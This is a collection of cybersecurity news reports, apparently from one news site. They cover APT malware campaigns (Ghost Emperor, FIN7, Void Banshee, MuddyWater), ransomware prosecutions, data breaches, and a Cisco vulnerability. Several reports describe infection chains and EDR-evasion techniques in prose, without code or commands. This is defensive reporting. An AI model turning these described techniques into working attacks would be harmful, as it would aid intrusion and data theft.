A China-linked hacking group known as Ghost Emperor has resurfaced with an updated version of its sophisticated Demodex rootkit, according to cybersecurity researchers. Ghost Emperor typically targets Southeast Asian telecom and government entities, and has modified its infection chain and added new evasion techniques to its malware arsenal.

New Ghost Emperor Demodex Infection Chain

GhostEmperor employs a multi-stage malware to achieve stealth execution and persistence and utilizes several methods to impede analysis process. [caption id="attachment_82910" align="alignnone" width="2048"] Source: sygnia.co[/caption] Researchers from Sygnia discovered that the updated Demodex infection chain begins when attackers use WMIExec, a remote execution tool, to run a batch file on the victim's machine. The batch file drops a CAB file named "1.cab" to C:\Windows\Web, extracts four files, and imports two malicious registry files to target systems using the reg.exe import [file] command. The threat actor employs legitimate Microsoft tools, such as reg.exe and expand.exe, to achieve stealth in its attack operations. After importing the registry keys, the batch file executes an encrypted PowerShell script to create a new service named "WdiSystem" to load a malicious Service DLL (prints1m.dll) file. The script also creates a service group called "WdiSystemhost" and runs the malicious service within this group, in order to masquerade the malware process as a legitimate Windows system process within the operating system. The Service DLL dynamically loads necessary functions using an internal OS structure named Process Environment Block, accesses the LoadLibraryA function, and deciphers an encrypted configuration containing parameters such as initial sleep time, registry paths of the shellcode location, and a list of module and function names required for operation. The security firm's incident response team uncovered the new variant while investigating a network breach that affected both a client and its business partner. The malware, compiled in July 2021, shares similarities with a version analyzed by Kaspersky in 2021 but incorporates several key changes.

Enhanced Evasion Techniques

The attack operation employs an EDR evasion technique by setting a specific mitigation policy to its processes, forbidding the loading of DLLs that are not signed by Microsoft. This limits user-mode hooking and helps circumvent analysis tools. The service also reads two encrypted registry keys, decrypts the shellcode, and sets up a reflective loader to execute the core-implant DLL. The researchers note that Ghost Emperor has implemented the following new methods to evade detection

• EDR Evasion: The malware sets a process mitigation policy that prevents loading of non-Microsoft signed DLLs, potentially blocking security software from injecting monitoring code.
• Dynamic Function Loading: The malicious DLL dynamically loads necessary functions, making static analysis more difficult.
• Encrypted Configuration: Key parameters, including registry paths and required function names, are stored in an encrypted configuration within the DLL.
• Reflective Loading: A position-independent shellcode acts as a reflective loader for the core implant, which is stored as a corrupted PE file to resist analysis.

The researchers have shared the following list of IOCs (Indicators of Compromise) [caption id="attachment_82909" align="aligncenter" width="463"] Source: sygnia.co[/caption] The Ghost Emperor threat actor group is the latest among several Chinese-linked APTs that demonstrate advanced techniques and evolved capabilities in its operations, raising concerns among governments, independent researchers and security firms about threats from the region.

Two foreign nationals from the notorious international ransomware group LockBit pleaded guilty in the in Newark federal court for participating in the group and deploying attacks against victims in the United States and worldwide. Ruslan Magomedovich Astamirov, 21, a Russian national, and Mikhail Vasiliev, 34, a dual Canadian-Russian citizen, admitted to involvement in these activities. Between 2020 and 2024, the LockBit group had attacked over 2,500 victims in at least 120 countries, with 1,800 of those in the United States, extorting hundreds of millions of dollars in the form of ransom payments.

Scope of LockBit's Operations

The guilty pleas follow a recent disruption of LockBit ransomware in February, in which the UK National Crime Agency's Cyber Division, working with the Justice Department, FBI, and other international law enforcement partners, seized public-facing websites and control of servers used by LockBit administrators, disrupting the group's ability to attack and encrypt networks. The disruption diminished LockBit's reputation and ability to attack further victims. The case also involves charges brought against other LockBit members, including its alleged creator, developer, and administrator, Dmitry Yuryevich Khoroshev, who is currently the subject of a reward of up to $10 million through the U.S. Department of State's Transnational Organized Crime Rewards Program. Khoroshev is accused of recruiting new affiliate members, acting as the representative for the group, and developing and maintaining the infrastructure used by affiliates to deploy LockBit attacks. U.S. Attorney Philip R. Sellinger emphasized the commitment to holding cybercriminals accountable, stating:

“Astamirov and Vasiliev thought that they could deploy LockBit from the shadows, wreaking havoc and pocketing massive ransom payments from their victims, without consequence. They were wrong. We, in New Jersey, along with our domestic and international law enforcement partners will do everything in our power to hold LockBit’s members and other cybercriminals accountable, disrupt and dismantle their operations, and put a spotlight on them as wanted criminals – no matter where they hide."

Impact of the Guilty LockBit Pleas

Astamirov, who operated under aliases such as "BETTERPAY" and "Eastfarmer," deployed LockBit against at least 12 victims between 2020 and 2023, extorting approximately $1.9 million in ransom payments. He agreed to forfeit $350,000 in seized cryptocurrency as part of his plea agreement. Vasiliev, who was known online as "Ghostrider" and "Free," among other aliases, targeted at least 12 victims between 2021 and 2023, causing at least $500,000 in damages and losses. These guilty pleas follow a recent disruption of LockBit's infrastructure by international law enforcement agencies in February. The operation significantly diminished the group's ability to attack further victims and damaged its reputation.

LockBit Victim Assistance

LockBit victims are encouraged to contact the FBI and submit information at https://lockbitvictims.ic3.gov. Law enforcement has developed decryption capabilities that may enable hundreds of victims around the world to restore systems encrypted using the LockBit ransomware variant. Victims are also encouraged to visit https://www.justice.gov/usao-nj/lockbit for case updates and information regarding their rights under U.S. law, including the right to submit victim impact statements and request restitution.

In today's digital age, healthcare data has become a prime target for cybercriminals. With a single health record fetching up to $1,000 on the dark web, Chief Information Security Officers (CISOs) in the healthcare sector face unprecedented challenges. Healthcare data's comprehensive nature makes it a high-value commodity on the dark web, attracting cybercriminals seeking to exploit outdated IT systems and ransomware vulnerabilities. With the help of Cyble's skilled threat intelligence researchers, we offer dark web monitoring insights for CISOs, delving into the dark web's lure for healthcare data, the risks presented by healthcare data breaches, and the essential steps CISOs must take to secure sensitive information.

Dark Web's Allure for Healthcare Data

The dark web, defined as that part of the web that is excluded from search engines and can often only be accessed through specialized browsers like Tor, has become a hub for the illicit activities of cybercriminals. The dark web's anonymity provides a safe haven for illegal activities and an ideal setting for the sale of stolen healthcare data. A single health record can fetch a price as high as $1,000, exceeding the value of credit card or Social Security numbers. In an article on its website, the American Hospital Association Center for Health Innovation cites data from an IBM Security study, stating:

In fact, stolen health records may sell up to 10 times or more than stolen credit card numbers on the dark web. Unfortunately, the bad news does not stop there for health care organizations — the cost to remediate a breach in health care is almost three times that of other industries — averaging $408 per stolen health care record versus $148 per stolen non-health record.

[caption id="attachment_82826" align="alignnone" width="1721"] Post on BreachForums alleging breach of HealthCare.gov[/caption] According to Cyble Research and Intelligence Labs (CRIL), outdated IT infrastructure and operating systems in many healthcare organizations leave them vulnerable to cyberattacks. The COVID-19 pandemic has further exacerbated these risks by necessitating remote work and creating new security gaps. Cybercriminals have developed a sophisticated multi-tiered business model for stolen healthcare data, making it difficult for law enforcement to trace the source. Illegally obtained data is commoditized and sold, with the price varying based on the potential value to the buyer. This data is often combined with other information to create complete patient profiles, which are then sold for various fraudulent activities. The comprehensive nature of healthcare data records and its richness in personal information makes it a goldmine for identity theft and insurance fraud - and a threat that healthcare CISOs need to stay on top of.

Ransomware Disruptions to Healthcare

Ransomware attacks have become a profitable venture for cybercriminals, with healthcare organizations prime targets due to the critical nature of their services and the high value of patient data. These disruptions can lead to compromised patient care, increased mortality rates, and severe financial and operational consequences. [caption id="attachment_82820" align="alignnone" width="2076"] Source: Cyble Threat Landscape Report 2024 (Emerging Threats to the U.S. Healthcare Sector in 2024)[/caption] According to data from the Director of National Intelligence, ransomware attacks on healthcare providers have surged, with an increase of up to 128 percent in the U.S. alone, with 258 victims in 2023 compared to 113 victims in 2022. The study found that LockBit and ALPHV/BlackCat were the two most "popular RaaS providers" and were responsible for more than 30 percent of all reported healthcare attacks that had occurred worldwide. [caption id="attachment_82831" align="alignnone" width="2096"] Source: dni.gov[/caption] These attacks not only disrupt services but also lead to increased patient stay lengths, delays in medical procedures, and in some cases, higher mortality rates, substantial financial costs, potential HIPAA violations and even reputational damage to the healthcare institute. And the data stolen in these attacks often winds up for sale on the dark web. The DNI's study stated, "US hospitals have delayed medical procedures, disrupted patient care because of multi-week outages, diverted patients to other facilities, rescheduled medical appointments, and strained acute care provisioning and capacity as a result of ransomware attacks." [caption id="attachment_82821" align="alignnone" width="1906"] Source: Cyble Threat Landscape Report (Emerging Threats to the U.S. Healthcare Sector in 2024)[/caption] Cybercriminals employ various tactics in healthcare ransomware attacks, including:

• Phishing emails with malicious links
• Complex attacks designed to maximize damage
• Encrypting personal health information (PHI)
• Exploiting vulnerabilities in medical devices

Protecting the Healthcare Sector

As healthcare data becomes increasingly valuable on the dark web, CISOs must remain vigilant and proactive. By implementing robust security measures, educating staff, and empowering patients, healthcare organizations can better protect sensitive information from cyber threats. Educating healthcare staff on data handling: The persistent targeting of the healthcare industry highlights the vital need for cybersecurity training efforts. Staff must be educated on identifying phishing attempts, using secure authentication practices like MFA, complying with HIPAA and other laws, and adhering to mobile and other device security policies. A visible and accessible healthcare security team, supported by proactive leadership, can foster a culture where security is everyone's responsibility. Patient involvement in protecting healthcare data: Patients also have a role to play in the protection of healthcare data - they should actively review health records, use secure healthcare channels, and report any suspicious activities to healthcare providers. Monitoring the dark web: Tools such as Cyble’s dark web monitoring solution offer early breach detection capability and AI-powered threat tagging, enabling CISOs to identify threats and breaches earlier to address and contain problems faster. Comprehensive logging of healthcare systems: Comprehensive logging of your healthcare systems can help CISOs and security staff track and analyze potential security incidents. Strong access controls: Implementing strong access controls for critical healthcare systems, including role-based access control (RBAC), Multi-factor authentication and the principle of least privilege, can help prevent hacker access to sensitive data. Regularly reviewing and updating access controls can help ensure compliance with changing security requirements. Data encryption: Encrypting sensitive healthcare data in transit and at rest using industry-standard encryption protocols (e.g., SSL/TLS, AES) can help protect that data from unwanted access. Secure mobile devices: Developing and enforcing a mobile device security policy should include best practices for device configuration, password management, and data encryption for mobile devices used within the healthcare environment. Network segmentation: Implementing network segmentation can isolate critical healthcare systems and reduce the attack surface. Keep software, firmware, and applications updated: Establishing a regular update schedule for software, firmware, and applications used in healthcare systems can help keep threat actors out of your systems. Implement automated update mechanisms where possible to minimize downtime and ensure timely patching of vulnerabilities.

Monitoring the Dark Web for Healthcare Data

Healthcare CISOs can do a lot to protect patient data and keep it off the dark web by isolating and securing critical systems and encrypting data. But in the event that some data does leak out, dark web monitoring solutions are your best bet for an early warning.

Pueblo County School District 70 is taking steps to address a recent data breach and ransomware attack that may have compromised the personal information of former students of the Colorado school district, as well as current and former staff. The data compromised in the Pueblo County School District 70 data breach is believed to stem from between 1991 and 2006, and is said to include student and staff records from an undetermined period. Superintendent Ronda Rein acknowledged the delay of public disclosure of the data breach incident, and confirmed the involvement of federal agencies in its investigation.

Pueblo County School District 70 Data Breach Response

According to one report the district had been notified of the ransomware attack by Sophos on April 27, and a data breach was confirmed by the CIA on May 15. IT technicians and agents from various organizations, including Pueblo School District 60, Colorado State University Pueblo, the CIA, and the FBI, assisted in identifying the affected data. According to Superintendent Ronda Rein, the district was not allowed to release information immediately due to the involvement of the CIA in the investigation. It's not clear why the CIA was involved in the matter. [caption id="attachment_82599" align="aligncenter" width="466"] Pueblo County School District 70 Data Breach Notice (Source: district70.org)[/caption] Rein emphasized that the district has taken measures to strengthen its systems and protect personal information. These measures include implementing two-step authentication on staff accounts, removing critical information from local servers to cloud-based servers, and hiring a full-time staff member responsible for cybersecurity. The district has also limited access to district resources to U.S.-based requests and narrowed its firewall and VPN access to admin staff only.

Advice for Affected Individuals

In its data breach notice, the Pueblo County School District 70 advised students, staff, alumni, and community members to monitor credit reports and financial statements, consider restricting access to their credit report, consider a fraud alert, and protect themselves from suspicious communications. Those seeking additional assistance can contact the district's IT support team at 719-549-6121. By taking active measures to strengthen its systems and inform affected individuals, Pueblo County School District 70 hopes to support its community during potential fallout from the data breach incident. Superintendent Rein stated, "We take the privacy and security of our community's information extremely seriously." She added, "We are working diligently with cybersecurity experts to fully understand the scope of this incident and to strengthen our systems against future threats. The incident notice promoted the use of identity theft protection resources available through Equifax, Experian, LifeLock, and TransUnion, stating that contact information for the mentioned agencies were available on the school district's website. "We apologize for any concern or inconvenience this may cause and are committed to supporting our community through this process," the data breach notice read.

Researchers have observed a seemingly innocuous software installer named HotPage.exe being used to deploy a Microsoft-signed driver with the capability of injecting code into remote system processes and intercepting browser traffic. While the malware had been initially detected as adware, its malware-like ability to modify web content and redirect users raised red flags among security researchers. The driver, signed by Microsoft, was developed by an obscure Chinese company called Hubei Dunwang Network Technology Co., Ltd.

Intrusive Nature of HotPage

Advertised towards Chinese-speaking users, the software claims to enhance web browsing by blocking ads and malicious sites. However, in reality HotPage abuses its functions to display game-related ads and collect system information. At its core, researchers from ESET state that the malware functions through the use of a Microsoft-signed driver to perform code injection into processes running on the infected system. Along with this code execution, the malware installs two libraries designed to intercept and manipulate browser network traffic to affected systems. This allows the malware to modify web page content, redirect users, or even open new tabs based on predetermined conditions. The kernel-level access granted by the embedded driver opens up pathways for the deployment of additional malware payloads on victim systems. Through the exploitation of improper access restrictions, the malware potentially allows threat actors to execute code with the highest available privileges within the Windows operating system. Following the discovery of these vulnerabilities, the Microsoft Security Response Center (MSRC) was notified on March 18, 2024. By May 1, 2024, the driver was removed from the Windows Server Catalog, with researchers identifying the threats as Win{32|64}/HotPage.A and Win{32|64}/HotPage.B. [caption id="attachment_82628" align="alignnone" width="891"] Source: welivesecurity.com[/caption]

The Company Behind the Malware

The malware's developers had obtained an Extended Verification certificate from Microsoft for use in signing the HotPage driver. The company, Hubei Dunwang Network Technology Co., Ltd., had been established in January 2022 and is now owned by Wuhan Yishun Baishun Culture Media Co., Ltd., a small advertising firm. Despite claiming to offer security solutions, researchers believe the company's product seems to contradict its own license agreement. While the company stated that DwAdsafe lacked interception capabilities, the software actually includes intrusive monitoring and filtering functions. [caption id="attachment_82631" align="aligncenter" width="433"] Web-crawled screenshot of dwadsafe.com before shutdown (Source: welivesecurity.com)[/caption] The company's website, dwadsafe[.]com, is no longer accessible, but archived versions describe the product as an "Internet cafe active defense cloud platform." Researchers note conflicts between the company's license agreement and the software's actual purpose and capabilities. While masquerading as a helpful tool, HotPage poses significant risks to user privacy and system security. Its signed driver and deceptive marketing demonstrate a disturbing trend where malware programs are presented as legitimate software with well-intentioned purposes. The campaign underscores the critical need for thorough vetting processes for driver signing as threat actors attempt to exploit trust in legitimate software channels.

Cisco has issued a critical security advisory for a vulnerability in its Cisco Smart Software Manager On-Prem licensing tool, which could allow attackers to change any user's password, including those of administrators on license servers. The flaw, tracked as CVE-2024-20419, affects SSM On-Prem installations earlier than Release version 7.0, also known as Cisco Smart Software Manager Satellite (SSM Satellite).

Cisco Smart Software Manager On-Prem Vulnerability

The vulnerability has been rated at the maximum severity score of 10.0 on the CVSS scale, and stems from an improper implementation of the password-change process in SSM On-Prem's licensing authentication system. [caption id="attachment_82558" align="alignnone" width="2162"] Source: sec.cloudapps.cisco.com[/caption] The National Vulnerability Database provides the following description about the vulnerability:

A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device."

As a Cisco Smart Licensing component, SSM On-Prem plays a crucial role in managing customer accounts and product licenses for service providers and Cisco partners. Successful exploitation of this flaw enables attackers to send crafted HTTP requests and gain access to the web UI or API with all the privileges associated with compromised user accounts.

SSM On-Prem Disclosure and Official Patch

Cisco acknowledged the disclosure of the vulnerability and expressed appreciation for the efforts of Mohammed Adel, the researcher who reported this vulnerability. Cisco has released software updates to address the vulnerability, and stated that there were no available workarounds. Cisco has advised customers with active service contracts to obtain the necessary security fixes through their regular update channels. Those without service contracts can contact the Cisco Technical Assistance Center (TAC) to obtain the required upgrades. Cisco's Product Security Incident Response Team (PSIRT) has not yet found evidence of public proof-of-concept (POC) exploits or active exploitation attempts targeting this vulnerability. However, the company urges customers to remain vigilant and regularly consult Cisco security advisories to stay informed about the latest threats and mitigation strategies. [caption id="attachment_82556" align="alignnone" width="2162"] Source: sec.cloudapps.cisco.com[/caption] The company has provided a clear roadmap for affected and fixed releases, as detailed in the advisory. Customers are strongly encouraged to upgrade to the appropriate fixed software release to secure their SSM On-Prem installations and protect against potential exploitation. It is essential to ensure that devices that are to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. Customers are advised to regularly consult advisories for Cisco products to determine exposure and a complete upgrade solution. The Cisco Support and Downloads page on Cisco.com provides information about licensing and downloads.

Recruit Co., Ltd., a prominent Tokyo-based company, recently announced a data breach had affected its real estate wing SUUMO and had compromised sensitive data from several of its employees. The incident, discovered on July 9, involved unauthorized access to a server used to test out some of its real estate services. The company says no user or customer information was compromised, and no secondary damage has been reported. However, the breach exposed personal data records of 1,313 current and former employees going as far back as 2007. The firm has also come under increased scrutiny recently over its data collection policies of student data as well as its outsourcing to foreign nations.

Recruit Co Ltd Response and Preventive Measures

On July 9th, SUUMO, the real estate branch of Recruit, had detected unauthorized access from a third party to the server of a service provided to real estate companies and which was being tested before deployment in some areas. [caption id="attachment_82339" align="alignnone" width="2186"] Source: suumo.jp[/caption] While the affected system had been shut down, it was discovered some of this data relating to employees had been compromised. Recruit expressed regret for the inconvenience and concern stemming from the incident. Recruit took several actions to limit the impact of the breach, including:

• Contacting affected employees individually
• Setting up a hotline for inquiries
• Implementing measures against unauthorized access
• Rebuilding and re-inspecting affected servers
• Strengthening overall security measures

The statement on its website, issued from the head office in Chiyoda-ku, Tokyo by  President and CEO Yoshihiro Kitamura, announced that data related to 1,313 employees and contractors involved in the development and maintenance of its housing-related services since 2007. "We would like to report the following and offer our deepest apologies for the considerable inconvenience and concern caused to all concerned parties," the statement expressed. "In addition, no leaks of user or customer information have been confirmed in this incident. As of today, no secondary damage caused by the use of employee information has been confirmed," it added.

Concerns Over Student Data Management and Outsourcing

In a separate recent development, Recruit Co. came under intense scrutiny for its handling of public school students' personal data. While the company had also been authorized by some local governments to collect and manage student information to provide various educational apps, other local governments reported that they had not fully been aware of the data collection practices. These concerns were raised further as it came to light that Recruit had allegedly shared some of this data with foreign businesses to improve other commercial apps. A Yomiuri Shimbun survey found that at least 14 local governments have introduced Recruit’s apps this fiscal year, and about 85,000 elementary and junior high school students use the apps. Some of the local governments were unaware of the overseas outsourcing and other improper management of students’ personal data. The education ministry announced plans to investigate the situation nationwide, after suspecting mismanagement of student data by local governments and the firm. The ministry emphasized the importance of local governments taking proper initiative while collecting and managing students' data, and requires them to supervise app providers and exercise caution when storing data overseas.

Genetic testing company 23andMe has reached a settlement in principle for class actions stemming from a 2023 data breach, lawyers announced during a San Francisco court hearing on Tuesday. The breach compromised the personal information of nearly 7 million users, including sensitive genetic profiles. While the settlement details remain undisclosed, U.S. District Judge Edward Chen of the Northern District of California scheduled a July 30 hearing to review the status of the term sheet. A motion for preliminary approval is expected within 30 to 45 days.

23andMe Settlement Negotiations and Terms

[caption id="attachment_82304" align="alignnone" width="1672"] Source: blog.23andme.com[/caption] Co-lead plaintiffs' counsel Cari Laufenberg of Keller Rohrback told Judge Chen that the parties accepted a proposal from mediator Randall Wulff following a June 26 meeting. The agreement in principle comes after a swift resolution process, with some plaintiffs' lawyers initially disagreeing in early settlement talks. Earlier in January, some plaintiffs' counsels met with 23andMe representatives to discuss settlement, but disagreements over the best approach for breach victims led to a battle over leadership of the cases. U.S. District Judge Edward Chen of the Northern District of California intervened last month, appointing co-lead counsels to oversee the cases. At a hearing last month, lawyers expressed concerns that 23andMe was in imminent danger of filing bankruptcy, suggesting that injunctive relief, including a fund to compensate class members for psychological or physical harm, would be a key focus of any settlement. The settlement is expected to encompass the multidistrict litigation, state court cases, and thousands of arbitration demands. While specific terms are not yet public, previous discussions suggested a potential 'steep discount' in monetary relief for class members in a case that faced up to $3 billion in damages under the Illinois Genetic Information Privacy Act. The terms in the settlement may include Injunctive relief from 23andMe (requiring a certain party to act in a certain way) and to provide options such as dark web monitoring to victims.

Financial Implications and Company Response

[caption id="attachment_82306" align="alignnone" width="2018"] Source: 23andme.com[/caption] 23andMe's annual report revealed $216 million in cash, which could impact the settlement amount. The company's attorney, Ian Ballon of Greenberg Traurig, expressed a focus on settlement and approval moving forward. A 23andMe spokesperson stated that the agreement is "in the best interest of 23andMe customers," and the company looks forward to finalizing the settlement. This resolution comes as a relief to the company, which faced potential bankruptcy concerns raised by lawyers during previous hearings. The settlement marks a significant step in addressing the fallout from the data breach, relieving some fears that had been stoked earlier after the genetic information of specific ethnic groups had been compromised. This specific data had been advertised earlier on a hacking forum as a list of Ashkenazi Jews, while another had been described as another as a list of people of Chinese descent. As the case progresses, the final terms of the settlement will provide insight into how 23andMe plans to compensate affected users and improve its data security measures.

FIN7, a financially motivated threat actor group with origins in Russia, has shown a persistent determination to evolve and adapt its tactics despite setbacks and arrests, utilizing multiple pseudonyms to mask its true identity and sustain its criminal operations. The group, which has been active since 2012, initially focused on point-of-sale malware for financial fraud, but shifted to ransomware operations in 2020, affiliating with well-known ransomware-as-a-service groups and launching its own independent programs.

FIN7 Underground Operations

New research from SentinelOne has uncovered FIN7's recent activities in underground criminal forums, where the group markets its tools and services under various fake aliases. Of these tools, the group has most prominently been selling a highly specialized tool labelled as AvNeutralizer (also known as AuKill) that is designed to disable most security solutions. [caption id="attachment_82281" align="alignnone" width="932"] Source:sentinelone.com[/caption] Advertisements for the AvNeutralizer tool appeared on multiple different forums under various usernames, for sale in prices ranging from $4,000 to $15,000. Researchers state that the tool's widespread adoption by various ransomware groups suggests it is no longer exclusive to a single threat actor's operations. Researchers identified several usernames – including "goodsoft," "lefroggy," "killerAV" and "Stupor" – that suggested association with the FIN7 cybercriminal group in promoting its tools and services, such as a post-exploitation framework labelled as "PentestSoftware." [caption id="attachment_82287" align="alignnone" width="1073"] Source:sentinelone.com[/caption] The group's use of multiple identities across different forums appears to be a strategy to mask its true identity while maintaining its illicit operations.

FIN7 Arsenal Used in Operations

The FIN7 cybercriminal group's success in executing sophisticated cyberattack operations relies on a versatile toolkit that includes:

• Powertrash: A heavily obfuscated PowerShell script used to reflectively load malware in memory, evading detection.
• Diceloader: A minimal backdoor allowing attackers to establish command and control channels and load additional modules.
• SSH-based backdoor: A persistence mechanism using OpenSSH and 7zip to maintain access to compromised systems.
• Core Impact: A commercial penetration testing tool repurposed for malicious activities.
• AvNeutralizer: A specialized tool for disabling security solutions.

Analysis of Powertrash samples revealed a timeline of FIN7's malware evolution, showing a transition from Carbanak to Diceloader (also known as Lizar) in early 2021. The group has also incorporated the Core Impact pentesting tool into its arsenal, in correlation with observed underground forum activity where FIN7-associated accounts actively sought cracked copies of the software. FIN7's infrastructure includes command and control servers for Diceloader, which researchers have tracked across various countries and hosting providers. In one instance, an exposed server revealed the group's use of an SSH-based backdoor for stealthy file exfiltration. The group's adoption of commercial tools like Core Impact demonstrates its commitment to using sophisticated, hard-to-detect methods for compromising target networks. The new research sheds light on FIN7’s persistent adaptability and ongoing evolution in its operations, which include adoption of automated attack methods such as the targeting of publicly-facing servers through the use of automated SQL injection attacks. Additionally, the group's development and sale of specialized independently-developed tools such as AvNeutralizer in various criminal underground forums bolster the group's impact and influence among other cybercriminals while demonstrating its technical expertise. Fin7's use of multiple identities and active collaboration with other threat actor groups makes it much more challenging for researchers to attribute their operations. The researchers said they hope the research would inspire more efforts to understand and protect against FIN7’s continually evolving attack tactics.

Researchers have uncovered a critical vulnerability (CVE-2024-38112) that the Void Banshee threat actor group has been actively exploiting in a recent campaign to deploy the Atlantida info-stealer through a disabled version of Internet Explorer. The campaign highlights the security risks introduced by the maintenance of legacy software on modern systems.

Anatomy of Void Banshee Attack-Chain

The Void Banshee group lures victims by disguising malicious files as e-books and sharing them through cloud services, Discord servers and online libraries. When a user opens one of these files – typically a zip archive masquerading as a PDF and containing malicious shortcut files, they trigger a chain of events that ultimately installs the Atlantida stealer. [caption id="attachment_82082" align="alignnone" width="1920"] Source: trendmicro.com[/caption] Researchers from Trend Micro stated that the the attack chain begins with a spearphishing email containing a zip archive with a malicious file disguised as a PDF. The file, named "Books_A0UJKO.pdf.url", uses the MHTML protocol handler and the x-usc! directive to exploit the CVE-2024-38112 vulnerability. This allows the attacker to access and execute files through the disabled IE process. The malicious file downloads an HTML file, which in turn downloads an HTA file that contains a Visual Basic Script (VBScript) that decrypts and executes a PowerShell script. [caption id="attachment_82084" align="alignnone" width="1101"] Legacy Internet Explorer version on Modern Systems (Source: trendmicro.com)[/caption] The PowerShell script downloads an additional script from a compromised web server and executes it, creating a new process for the downloaded script. This script is designed to download and execute a PowerShell trojan, which can be used to compromise the victim's system. The campaign ultimately exploits the vulnerability in the MHTML protocol handler to access and run files through the system in-built disabled instance of Internet Explorer. This technique bypasses normal security controls and allows the attackers to directly execute the Atlantida info-stealer malware on the victim's system. The researchers note that Atlantida is based on previous open-source stealers such as  NecroStealer and PredatorTheStealer, designed with many of the same capabilities as these stealers. It targets sensitive information from various applications, including Telegram, Steam, FileZilla, cryptocurrency wallets and web browsers such as Chrome and Microsoft Edge to exfiltrate sensitive and important data, such as passwords and cookies. The malware allows attackers to capture victim's screens and exfiltrate information from cryptocurrency-associated browser extensions, registering each extension with a unique 'Extension ID.' Data exfiltrated from the attack is compressed within a ZIP archive file and transmitted via TCP.

Microsoft Patched Vulnerability

The researchers disclosed the vulnerability to Microsoft, which patched the vulnerability in its July 2024 update cycle, unregistering the MHTML handler from Internet Explorer. However, experts warn that many systems may remain unpatched and vulnerable. To protect against this and similar attacks, security professionals recommend:

• Promptly applying all available Windows security updates
• Implementing robust email filtering to block malicious attachments
• Educating users about the dangers of opening suspicious files or links
• Deploying endpoint protection software capable of detecting and blocking such attacks

As cybercriminals continue to exploit overlooked vulnerabilities in legacy systems, the discovery of CVE-2024-38112 serves as a stark reminder of the importance of comprehensive security measures and timely patching.

MuddyWater, a notorious threat actor group linked to the Iranian intelligence service, has been operating a new malware campaign that targeted several Western and Middle Eastern entities. The malware, dubbed "MuddyRot," is a backdoor implant developed in C with a wide range of capabilities and was used primarily to attack various countries in the Middle East, such as Turkey, Azerbaijan, Jordan, Saudi Arabia, and Israel.

MuddyRot Malware

Researchers from Sekoia observed that the new MuddyRot malware is distributed through malicious PDF files and relies on public exploits to compromise internet-exposed servers, such as Exchange or SharePoint servers, moving laterally within the entire network after successful compromise. After this stage, the threat actors sent spear phishing emails from compromised email accounts to bypass security measures and increase the appearance of legitimacy in the recipient’s eyes. [caption id="attachment_82047" align="alignnone" width="1311"] Source: blog.sekoia.io[/caption] MuddyRot is a sophisticated malware that uses a combination of obfuscation and encryption to evade detection from security tools. Upon execution, the malware de-obfuscates strings, loads necessary functions, and creates a 'mutex' (lock-in program that prevents simultaneous access from other processes) to establish exclusive control over the program. It also uses dynamic import loading to reduce the potential digital footprint. [caption id="attachment_82050" align="alignnone" width="1551"] Source: blog.sekoia.io[/caption] The malware establishes persistence on the infected host by creating a scheduled task and copying itself to a system directory. It then communicates with its command and control (C2) server over a raw TCP socket. The MuddyRot malware supports various commands, including file upload and download, reverse shell, and process kill. The reverse shell capability allows the operator to connect to the victim host and execute commands remotely, capturing the results in real-time. The malware's C2 communication is obfuscated, using a fixed subtraction value to decode the incoming inputs and add three bytes to the output. The developer of this backdoor added the "terminate" command to stop the reverse shell. The MuddyRot backdoor implant is capable of executing the following commands: [caption id="attachment_82061" align="alignnone" width="1658"] Source: blog.sekoia.io[/caption] These commands are communicated with C2 servers over the TCP port 443, along with further obfuscation to avoid detection.

Shifting Tactics

The MuddyWater group altered its infection strategy from relying on off-the-shelf software remote monitoring tools such as Atera and SimpleHelp to the custom-built MuddyRot implant. While the exact reasons for this switch are unknown, the researchers speculate that the change could be due to the the increased scrutiny of these tools by security vendors, with the attackers possibly running into difficulties during deployment of the Atera tool on targets. These difficulties may have prompted the group to switch to something more custom. The researchers note the departure in the MuddyWater's group's recent campaigns from their traditional infection chain to the use of well-known exploits and distribution of spear phishing emails with PDF files embedded with links to load the MuddyRot validator. This new tactic allows the malware to evade detection and increases its chances of successful infection. The researchers have shared potential indicators of compromise (IOCs) over GitHub to protect against MuddyRot's deployment. Other cybersecurity firms such as Check Point and ClearSky recently conducted their own investigations into the new malware campaign from the Iranian threat actor.

The Philippine Department of Migrant Workers (DMW) has taken swift action to protect the personal data of overseas Filipino workers (OFWs) after a ransomware attack prompted the agency to shut down its online systems. While the attack may have caused inconvenience, the DMW has activated new protocols to cater to the daily transaction needs of OFWs to ensure that their information remains safe and secure.

Manual Processing at Department of Migrant Workers Offices

In a statement on Tuesday, the DMW said OFW data remains secure despite the cyber incident. The agency took its Management Information Technology System offline as a precautionary measure to protect worker information. To minimize disruption from the attack, the DMW activated manual processing of Overseas Employment Certificates and OFW passes at its national and regional offices, one-stop shops, and Migrant Workers Assistance Centers. The DMW stated, “As a result of a ransomware attack on DMW online systems, the Department through its Management Information Technology System had to take pre-emptive measures to protect OFW data and information, such as taking the systems offline. OFWs can visit these locations to obtain necessary documents while online systems are unavailable. The DMW has also established an email-based system for OFWs requiring access to information sheets. Rather than physically visiting DMW offices, workers can send requests to infosheet@dmw.gov.ph. The agency will then email QR-coded information sheets directly to the requesting OFW. Alternatively, OFWs can submit requests via the DMW's Facebook page Messenger. By taking these measures, the DMW said it is ensuring that OFWs can continue to access the services they need while it works to restore its systems online. The agency is also coordinating with the Bureau of Immigration and airport authorities to facilitate the smooth departure of OFWs. The DMW has apologized for any inconvenience caused by the attack and is working to restore its online systems and implement stronger measures to protect the information of OFWs. In a statement on social media, the DMW said, "Rest assured, DMW databases containing OFW data were not affected by the attack, and that the DMW is currently working with the Department of Information and Communications Technology to restore online systems and ensure continued protection of the data and information of OFWs."

Philippines Cyber Attacks

